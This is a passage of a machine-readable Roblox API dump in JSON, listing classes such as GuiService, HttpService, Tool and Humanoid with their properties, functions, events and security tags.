rom","tags":[],"Class":"BillboardGui"},{"ValueType":"UDim2","type":"Property","Name":"Size","tags":[],"Class":"BillboardGui"},{"ValueType":"Vector2","type":"Property","Name":"SizeOffset","tags":[],"Class":"BillboardGui"},{"ValueType":"Vector3","type":"Property","Name":"StudsOffset","tags":[],"Class":"BillboardGui"},{"Superclass":"LayerCollector","type":"Class","Name":"ScreenGui","tags":[]},{"Superclass":"ScreenGui","type":"Class","Name":"GuiMain","tags":["deprecated"]},{"Superclass":"LayerCollector","type":"Class","Name":"SurfaceGui","tags":[]},{"ValueType":"bool","type":"Property","Name":"Active","tags":[],"Class":"SurfaceGui"},{"ValueType":"Object","type":"Property","Name":"Adornee","tags":[],"Class":"SurfaceGui"},{"ValueType":"bool","type":"Property","Name":"AlwaysOnTop","tags":[],"Class":"SurfaceGui"},{"ValueType":"Vector2","type":"Property","Name":"CanvasSize","tags":[],"Class":"SurfaceGui"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"SurfaceGui"},{"ValueType":"NormalId","type":"Property","Name":"Face","tags":[],"Class":"SurfaceGui"},{"ValueType":"float","type":"Property","Name":"ToolPunchThroughDistance","tags":[],"Class":"SurfaceGui"},{"Superclass":"GuiBase","type":"Class","Name":"GuiBase3d","tags":[]},{"ValueType":"BrickColor","type":"Property","Name":"Color","tags":["deprecated","hidden"],"Class":"GuiBase3d"},{"ValueType":"Color3","type":"Property","Name":"Color3","tags":[],"Class":"GuiBase3d"},{"ValueType":"float","type":"Property","Name":"Transparency","tags":[],"Class":"GuiBase3d"},{"ValueType":"bool","type":"Property","Name":"Visible","tags":[],"Class":"GuiBase3d"},{"Superclass":"GuiBase3d","type":"Class","Name":"FloorWire","tags":["deprecated"]},{"ValueType":"float","type":"Property","Name":"CycleOffset","tags":[],"Class":"FloorWire"},{"ValueType":"Object","type":"Property","Name":"From","tags":[],"Class":"FloorWire"},{"ValueType":"float","type":"Property","Name":"StudsBetweenTextures","tags":[],"Class":"FloorWire"},{"ValueType":"Content","type":"Property","Name":"Texture","tags":[],"Class":"FloorWire"},{"ValueType":"Vector2","type":"Property","Name":"TextureSize","tags":[],"Class":"FloorWire"},{"ValueType":"Object","type":"Property","Name":"To","tags":[],"Class":"FloorWire"},{"ValueType":"float","type":"Property","Name":"Velocity","tags":[],"Class":"FloorWire"},{"ValueType":"float","type":"Property","Name":"WireRadius","tags":[],"Class":"FloorWire"},{"Superclass":"GuiBase3d","type":"Class","Name":"PVAdornment","tags":[]},{"ValueType":"Object","type":"Property","Name":"Adornee","tags":[],"Class":"PVAdornment"},{"Superclass":"PVAdornment","type":"Class","Name":"HandleAdornment","tags":[]},{"ValueType":"bool","type":"Property","Name":"AlwaysOnTop","tags":[],"Class":"HandleAdornment"},{"ValueType":"CoordinateFrame","type":"Property","Name":"CFrame","tags":[],"Class":"HandleAdornment"},{"ValueType":"Vector3","type":"Property","Name":"SizeRelativeOffset","tags":[],"Class":"HandleAdornment"},{"ValueType":"int","type":"Property","Name":"ZIndex","tags":[],"Class":"HandleAdornment"},{"Arguments":[],"Name":"MouseButton1Down","tags":[],"Class":"HandleAdornment","type":"Event"},{"Arguments":[],"Name":"MouseButton1Up","tags":[],"Class":"HandleAdornment","type":"Event"},{"Arguments":[],"Name":"MouseEnter","tags":[],"Class":"HandleAdornment","type":"Event"},{"Arguments":[],"Name":"MouseLeave","tags":[],"Class":"HandleAdornment","type":"Event"},{"Superclass":"HandleAdornment","type":"Class","Name":"BoxHandleAdornment","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Size","tags":[],"Class":"BoxHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"ConeHandleAdornment","tags":[]},{"ValueType":"float","type":"Property","Name":"Height","tags":[],"Class":"ConeHandleAdornment"},{"ValueType":"float","type":"Property","Name":"Radius","tags":[],"Class":"ConeHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"CylinderHandleAdornment","tags":[]},{"ValueType":"float","type":"Property","Name":"Height","tags":[],"Class":"CylinderHandleAdornment"},{"ValueType":"float","type":"Property","Name":"Radius","tags":[],"Class":"CylinderHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"ImageHandleAdornment","tags":[]},{"ValueType":"Content","type":"Property","Name":"Image","tags":[],"Class":"ImageHandleAdornment"},{"ValueType":"Vector2","type":"Property","Name":"Size","tags":[],"Class":"ImageHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"LineHandleAdornment","tags":[]},{"ValueType":"float","type":"Property","Name":"Length","tags":[],"Class":"LineHandleAdornment"},{"ValueType":"float","type":"Property","Name":"Thickness","tags":[],"Class":"LineHandleAdornment"},{"Superclass":"HandleAdornment","type":"Class","Name":"SphereHandleAdornment","tags":[]},{"ValueType":"float","type":"Property","Name":"Radius","tags":[],"Class":"SphereHandleAdornment"},{"Superclass":"PVAdornment","type":"Class","Name":"SelectionBox","tags":[]},{"ValueType":"float","type":"Property","Name":"LineThickness","tags":[],"Class":"SelectionBox"},{"ValueType":"BrickColor","type":"Property","Name":"SurfaceColor","tags":["deprecated","hidden"],"Class":"SelectionBox"},{"ValueType":"Color3","type":"Property","Name":"SurfaceColor3","tags":[],"Class":"SelectionBox"},{"ValueType":"float","type":"Property","Name":"SurfaceTransparency","tags":[],"Class":"SelectionBox"},{"Superclass":"PVAdornment","type":"Class","Name":"SelectionSphere","tags":[]},{"ValueType":"BrickColor","type":"Property","Name":"SurfaceColor","tags":["deprecated","hidden"],"Class":"SelectionSphere"},{"ValueType":"Color3","type":"Property","Name":"SurfaceColor3","tags":[],"Class":"SelectionSphere"},{"ValueType":"float","type":"Property","Name":"SurfaceTransparency","tags":[],"Class":"SelectionSphere"},{"Superclass":"GuiBase3d","type":"Class","Name":"PartAdornment","tags":[]},{"ValueType":"Object","type":"Property","Name":"Adornee","tags":[],"Class":"PartAdornment"},{"Superclass":"PartAdornment","type":"Class","Name":"HandlesBase","tags":[]},{"Superclass":"HandlesBase","type":"Class","Name":"ArcHandles","tags":[]},{"ValueType":"Axes","type":"Property","Name":"Axes","tags":[],"Class":"ArcHandles"},{"Arguments":[{"Name":"axis","Type":"Axis"}],"Name":"MouseButton1Down","tags":[],"Class":"ArcHandles","type":"Event"},{"Arguments":[{"Name":"axis","Type":"Axis"}],"Name":"MouseButton1Up","tags":[],"Class":"ArcHandles","type":"Event"},{"Arguments":[{"Name":"axis","Type":"Axis"},{"Name":"relativeAngle","Type":"float"},{"Name":"deltaRadius","Type":"float"}],"Name":"MouseDrag","tags":[],"Class":"ArcHandles","type":"Event"},{"Arguments":[{"Name":"axis","Type":"Axis"}],"Name":"MouseEnter","tags":[],"Class":"ArcHandles","type":"Event"},{"Arguments":[{"Name":"axis","Type":"Axis"}],"Name":"MouseLeave","tags":[],"Class":"ArcHandles","type":"Event"},{"Superclass":"HandlesBase","type":"Class","Name":"Handles","tags":[]},{"ValueType":"Faces","type":"Property","Name":"Faces","tags":[],"Class":"Handles"},{"ValueType":"HandlesStyle","type":"Property","Name":"Style","tags":[],"Class":"Handles"},{"Arguments":[{"Name":"face","Type":"NormalId"}],"Name":"MouseButton1Down","tags":[],"Class":"Handles","type":"Event"},{"Arguments":[{"Name":"face","Type":"NormalId"}],"Name":"MouseButton1Up","tags":[],"Class":"Handles","type":"Event"},{"Arguments":[{"Name":"face","Type":"NormalId"},{"Name":"distance","Type":"float"}],"Name":"MouseDrag","tags":[],"Class":"Handles","type":"Event"},{"Arguments":[{"Name":"face","Type":"NormalId"}],"Name":"MouseEnter","tags":[],"Class":"Handles","type":"Event"},{"Arguments":[{"Name":"face","Type":"NormalId"}],"Name":"MouseLeave","tags":[],"Class":"Handles","type":"Event"},{"Superclass":"PartAdornment","type":"Class","Name":"SurfaceSelection","tags":[]},{"ValueType":"NormalId","type":"Property","Name":"TargetSurface","tags":[],"Class":"SurfaceSelection"},{"Superclass":"GuiBase3d","type":"Class","Name":"SelectionLasso","tags":[]},{"ValueType":"Object","type":"Property","Name":"Humanoid","tags":[],"Class":"SelectionLasso"},{"Superclass":"SelectionLasso","type":"Class","Name":"SelectionPartLasso","tags":["deprecated"]},{"ValueType":"Object","type":"Property","Name":"Part","tags":[],"Class":"SelectionPartLasso"},{"Superclass":"SelectionLasso","type":"Class","Name":"SelectionPointLasso","tags":["deprecated"]},{"ValueType":"Vector3","type":"Property","Name":"Point","tags":[],"Class":"SelectionPointLasso"},{"Superclass":"GuiBase3d","type":"Class","Name":"TextureTrail","tags":["deprecated"]},{"ValueType":"float","type":"Property","Name":"CycleOffset","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"Object","type":"Property","Name":"From","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"float","type":"Property","Name":"StudsBetweenTextures","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"Content","type":"Property","Name":"Texture","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"Vector2","type":"Property","Name":"TextureSize","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"Object","type":"Property","Name":"To","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"ValueType":"float","type":"Property","Name":"Velocity","tags":["RobloxPlaceSecurity"],"Class":"TextureTrail"},{"Superclass":"Instance","type":"Class","Name":"GuiItem","tags":[]},{"Superclass":"GuiItem","type":"Class","Name":"Backpack","tags":[]},{"Superclass":"GuiItem","type":"Class","Name":"BackpackItem","tags":[]},{"ValueType":"Content","type":"Property","Name":"TextureId","tags":[],"Class":"BackpackItem"},{"Superclass":"BackpackItem","type":"Class","Name":"HopperBin","tags":["deprecated"]},{"ValueType":"bool","type":"Property","Name":"Active","tags":[],"Class":"HopperBin"},{"ValueType":"BinType","type":"Property","Name":"BinType","tags":[],"Class":"HopperBin"},{"ReturnType":"void","Arguments":[],"Name":"Disable","tags":["RobloxScriptSecurity"],"Class":"HopperBin","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ToggleSelect","tags":["RobloxScriptSecurity"],"Class":"HopperBin","type":"Function"},{"Arguments":[],"Name":"Deselected","tags":[],"Class":"HopperBin","type":"Event"},{"Arguments":[{"Name":"mouse","Type":"Instance"}],"Name":"Selected","tags":[],"Class":"HopperBin","type":"Event"},{"Superclass":"BackpackItem","type":"Class","Name":"Tool","tags":[]},{"ValueType":"bool","type":"Property","Name":"CanBeDropped","tags":[],"Class":"Tool"},{"ValueType":"bool","type":"Property","Name":"Enabled","tags":[],"Class":"Tool"},{"ValueType":"CoordinateFrame","type":"Property","Name":"Grip","tags":[],"Class":"Tool"},{"ValueType":"Vector3","type":"Property","Name":"GripForward","tags":[],"Class":"Tool"},{"ValueType":"Vector3","type":"Property","Name":"GripPos","tags":[],"Class":"Tool"},{"ValueType":"Vector3","type":"Property","Name":"GripRight","tags":[],"Class":"Tool"},{"ValueType":"Vector3","type":"Property","Name":"GripUp","tags":[],"Class":"Tool"},{"ValueType":"bool","type":"Property","Name":"ManualActivationOnly","tags":[],"Class":"Tool"},{"ValueType":"bool","type":"Property","Name":"RequiresHandle","tags":[],"Class":"Tool"},{"ValueType":"string","type":"Property","Name":"ToolTip","tags":[],"Class":"Tool"},{"ReturnType":"void","Arguments":[],"Name":"Activate","tags":[],"Class":"Tool","type":"Function"},{"Arguments":[],"Name":"Activated","tags":[],"Class":"Tool","type":"Event"},{"Arguments":[],"Name":"Deactivated","tags":[],"Class":"Tool","type":"Event"},{"Arguments":[{"Name":"mouse","Type":"Instance"}],"Name":"Equipped","tags":[],"Class":"Tool","type":"Event"},{"Arguments":[],"Name":"Unequipped","tags":[],"Class":"Tool","type":"Event"},{"Superclass":"Tool","type":"Class","Name":"Flag","tags":["deprecated"]},{"ValueType":"BrickColor","type":"Property","Name":"TeamColor","tags":[],"Class":"Flag"},{"Superclass":"GuiItem","type":"Class","Name":"ButtonBindingWidget","tags":[]},{"Superclass":"GuiItem","type":"Class","Name":"GuiRoot","tags":["notCreatable"]},{"Superclass":"GuiItem","type":"Class","Name":"Hopper","tags":["deprecated"]},{"Superclass":"GuiItem","type":"Class","Name":"StarterPack","tags":[]},{"Superclass":"Instance","type":"Class","Name":"GuiService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"AutoSelectGuiEnabled","tags":[],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"CoreGuiNavigationEnabled","tags":[],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"GuiNavigationEnabled","tags":[],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"IsModalDialog","tags":["deprecated","readonly"],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"IsWindows","tags":["deprecated","readonly"],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"MenuIsOpen","tags":["readonly"],"Class":"GuiService"},{"ValueType":"bool","type":"Property","Name":"ScreenGuiEnabled","tags":["RobloxScriptSecurity"],"Class":"GuiService"},{"ValueType":"Object","type":"Property","Name":"SelectedCoreObject","tags":["RobloxScriptSecurity"],"Class":"GuiService"},{"ValueType":"Object","type":"Property","Name":"SelectedObject","tags":[],"Class":"GuiService"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"dialog","Default":null},{"Type":"CenterDialogType","Name":"centerDialogType","Default":null},{"Type":"Function","Name":"showFunction","Default":null},{"Type":"Function","Name":"hideFunction","Default":null}],"Name":"AddCenterDialog","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"AddKey","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"selectionName","Default":null},{"Type":"Instance","Name":"selectionParent","Default":null}],"Name":"AddSelectionParent","tags":[],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"selectionName","Default":null},{"Type":"Tuple","Name":"selections","Default":null}],"Name":"AddSelectionTuple","tags":[],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"SpecialKey","Name":"key","Default":null}],"Name":"AddSpecialKey","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"int","Arguments":[],"Name":"GetBrickCount","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Vector3","Name":"position","Default":null}],"Name":"GetClosestDialogToPosition","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetErrorMessage","tags":["RobloxScriptSecurity","deprecated"],"Class":"GuiService","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"GetUiMessage","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"IsTenFootInterface","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"OpenBrowserWindow","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"dialog","Default":null}],"Name":"RemoveCenterDialog","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"RemoveKey","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"selectionName","Default":null}],"Name":"RemoveSelectionGroup","tags":[],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"SpecialKey","Name":"key","Default":null}],"Name":"RemoveSpecialKey","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"errorMessage","Default":null}],"Name":"SetErrorMessage","tags":["LocalUserSecurity","deprecated"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"int","Name":"x1","Default":null},{"Type":"int","Name":"y1","Default":null},{"Type":"int","Name":"x2","Default":null},{"Type":"int","Name":"y2","Default":null}],"Name":"SetGlobalGuiInset","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"open","Default":null}],"Name":"SetMenuIsOpen","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UiMessageType","Name":"msgType","Default":null},{"Type":"string","Name":"uiMessage","Default":null}],"Name":"SetUiMessage","tags":["LocalUserSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"input","Default":null}],"Name":"ShowStatsBasedOnInputString","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"ToggleFullscreen","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Function"},{"ReturnType":"Vector2","Arguments":[],"Name":"GetScreenResolution","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"YieldFunction"},{"Arguments":[],"Name":"BrowserWindowClosed","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[{"Name":"newErrorMessage","Type":"string"}],"Name":"ErrorMessageChanged","tags":["RobloxScriptSecurity","deprecated"],"Class":"GuiService","type":"Event"},{"Arguments":[],"Name":"EscapeKeyPressed","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[{"Name":"key","Type":"string"},{"Name":"modifiers","Type":"string"}],"Name":"KeyPressed","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[],"Name":"MenuClosed","tags":[],"Class":"GuiService","type":"Event"},{"Arguments":[],"Name":"MenuOpened","tags":[],"Class":"GuiService","type":"Event"},{"Arguments":[],"Name":"ShowLeaveConfirmation","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[{"Name":"key","Type":"SpecialKey"},{"Name":"modifiers","Type":"string"}],"Name":"SpecialKeyPressed","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"Arguments":[{"Name":"msgType","Type":"UiMessageType"},{"Name":"newUiMessage","Type":"string"}],"Name":"UiMessageChanged","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Event"},{"ReturnType":"void","Arguments":[{"Name":"title","Type":"string"},{"Name":"text","Type":"string"}],"Name":"SendCoreUiNotification","tags":["RobloxScriptSecurity"],"Class":"GuiService","type":"Callback"},{"Superclass":"Instance","type":"Class","Name":"GuidRegistryService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"HapticService","tags":["notCreatable"]},{"ReturnType":"Tuple","Arguments":[{"Type":"UserInputType","Name":"inputType","Default":null},{"Type":"VibrationMotor","Name":"vibrationMotor","Default":null}],"Name":"GetMotor","tags":[],"Class":"HapticService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"inputType","Default":null},{"Type":"VibrationMotor","Name":"vibrationMotor","Default":null}],"Name":"IsMotorSupported","tags":[],"Class":"HapticService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"inputType","Default":null}],"Name":"IsVibrationSupported","tags":[],"Class":"HapticService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UserInputType","Name":"inputType","Default":null},{"Type":"VibrationMotor","Name":"vibrationMotor","Default":null},{"Type":"Tuple","Name":"vibrationValues","Default":null}],"Name":"SetMotor","tags":[],"Class":"HapticService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"HttpRbxApiService","tags":["notCreatable"]},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"apiUrlPath","Default":null},{"Type":"bool","Name":"useHttps","Default":"true"},{"Type":"ThrottlingPriority","Name":"priority","Default":"Default"}],"Name":"GetAsync","tags":["RobloxScriptSecurity"],"Class":"HttpRbxApiService","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"apiUrlPath","Default":null},{"Type":"string","Name":"data","Default":null},{"Type":"bool","Name":"useHttps","Default":"true"},{"Type":"ThrottlingPriority","Name":"priority","Default":"Default"},{"Type":"HttpContentType","Name":"content_type","Default":"ApplicationJson"}],"Name":"PostAsync","tags":["RobloxScriptSecurity"],"Class":"HttpRbxApiService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"HttpService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"HttpEnabled","tags":["LocalUserSecurity"],"Class":"HttpService"},{"ReturnType":"string","Arguments":[{"Type":"bool","Name":"wrapInCurlyBraces","Default":"true"}],"Name":"GenerateGUID","tags":[],"Class":"HttpService","type":"Function"},{"ReturnType":"Variant","Arguments":[{"Type":"string","Name":"input","Default":null}],"Name":"JSONDecode","tags":[],"Class":"HttpService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"Variant","Name":"input","Default":null}],"Name":"JSONEncode","tags":[],"Class":"HttpService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"input","Default":null}],"Name":"UrlEncode","tags":[],"Class":"HttpService","type":"Function"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"bool","Name":"nocache","Default":"false"}],"Name":"GetAsync","tags":[],"Class":"HttpService","type":"YieldFunction"},{"ReturnType":"string","Arguments":[{"Type":"string","Name":"url","Default":null},{"Type":"string","Name":"data","Default":null},{"Type":"HttpContentType","Name":"content_type","Default":"ApplicationJson"},{"Type":"bool","Name":"compress","Default":"false"}],"Name":"PostAsync","tags":[],"Class":"HttpService","type":"YieldFunction"},{"Superclass":"Instance","type":"Class","Name":"Humanoid","tags":[]},{"ValueType":"bool","type":"Property","Name":"AutoJumpEnabled","tags":[],"Class":"Humanoid"},{"ValueType":"bool","type":"Property","Name":"AutoRotate","tags":[],"Class":"Humanoid"},{"ValueType":"Vector3","type":"Property","Name":"CameraOffset","tags":[],"Class":"Humanoid"},{"ValueType":"HumanoidDisplayDistanceType","type":"Property","Name":"DisplayDistanceType","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"Health","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"HealthDisplayDistance","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"HipHeight","tags":[],"Class":"Humanoid"},{"ValueType":"bool","type":"Property","Name":"Jump","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"JumpPower","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"LeftLeg","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"MaxHealth","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"MaxSlopeAngle","tags":[],"Class":"Humanoid"},{"ValueType":"Vector3","type":"Property","Name":"MoveDirection","tags":["readonly"],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"NameDisplayDistance","tags":[],"Class":"Humanoid"},{"ValueType":"NameOcclusion","type":"Property","Name":"NameOcclusion","tags":[],"Class":"Humanoid"},{"ValueType":"bool","type":"Property","Name":"PlatformStand","tags":[],"Class":"Humanoid"},{"ValueType":"HumanoidRigType","type":"Property","Name":"RigType","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"RightLeg","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"SeatPart","tags":["readonly"],"Class":"Humanoid"},{"ValueType":"bool","type":"Property","Name":"Sit","tags":[],"Class":"Humanoid"},{"ValueType":"Vector3","type":"Property","Name":"TargetPoint","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"Torso","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"WalkSpeed","tags":[],"Class":"Humanoid"},{"ValueType":"Object","type":"Property","Name":"WalkToPart","tags":[],"Class":"Humanoid"},{"ValueType":"Vector3","type":"Property","Name":"WalkToPoint","tags":[],"Class":"Humanoid"},{"ValueType":"float","type":"Property","Name":"maxHealth","tags":["deprecated"],"Class":"Humanoid"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"status","Default":null}],"Name":"AddCustomStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Status","Name":"status","Default":"Poison"}],"Name":"AddStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"HumanoidStateType","Name":"state","Default":"None"}],"Name":"ChangeState","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Instance","Name":"tool","Default":null}],"Name":"EquipTool","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetPlayingAnimationTracks","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"HumanoidStateType","Arguments":[],"Name":"GetState","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"HumanoidStateType","Name":"state","Default":null}],"Name":"GetStateEnabled","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetStatuses","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"status","Default":null}],"Name":"HasCustomStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Status","Name":"status","Default":"Poison"}],"Name":"HasStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"animation","Default":null}],"Name":"LoadAnimation","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"moveDirection","Default":null},{"Type":"bool","Name":"relativeToCamera","Default":"false"}],"Name":"Move","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector3","Name":"location","Default":null},{"Type":"Instance","Name":"part","Default":"nil"}],"Name":"MoveTo","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"status","Default":null}],"Name":"RemoveCustomStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"Status","Name":"status","Default":"Poison"}],"Name":"RemoveStatus","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetClickToWalkEnabled","tags":["RobloxScriptSecurity"],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"HumanoidStateType","Name":"state","Default":null},{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetStateEnabled","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"amount","Default":null}],"Name":"TakeDamage","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"UnequipTools","tags":[],"Class":"Humanoid","type":"Function"},{"ReturnType":"Instance","Arguments":[{"Type":"Instance","Name":"animation","Default":null}],"Name":"loadAnimation","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"float","Name":"amount","Default":null}],"Name":"takeDamage","tags":["deprecated"],"Class":"Humanoid","type":"Function"},{"Arguments":[{"Name":"animationTrack","Type":"Instance"}],"Name":"AnimationPlayed","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"speed","Type":"float"}],"Name":"Climbing","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"status","Type":"string"}],"Name":"CustomStatusAdded","tags":["deprecated"],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"status","Type":"string"}],"Name":"CustomStatusRemoved","tags":["deprecated"],"Class":"Humanoid","type":"Event"},{"Arguments":[],"Name":"Died","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"FallingDown","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"FreeFalling","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"GettingUp","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"health","Type":"float"}],"Name":"HealthChanged","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"Jumping","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"reached","Type":"bool"}],"Name":"MoveToFinished","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"PlatformStanding","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"}],"Name":"Ragdoll","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"speed","Type":"float"}],"Name":"Running","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"active","Type":"bool"},{"Name":"currentSeatPart","Type":"Instance"}],"Name":"Seated","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"old","Type":"HumanoidStateType"},{"Name":"new","Type":"HumanoidStateType"}],"Name":"StateChanged","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"state","Type":"HumanoidStateType"},{"Name":"isEnabled","Type":"bool"}],"Name":"StateEnabledChanged","tags":[],"Class":"Humanoid","type":"Event"},{"Arguments":[{"Name":"status","Type":"Status"}],"Name":"StatusAdded","tags":["deprecated"],"Class":"Humanoid"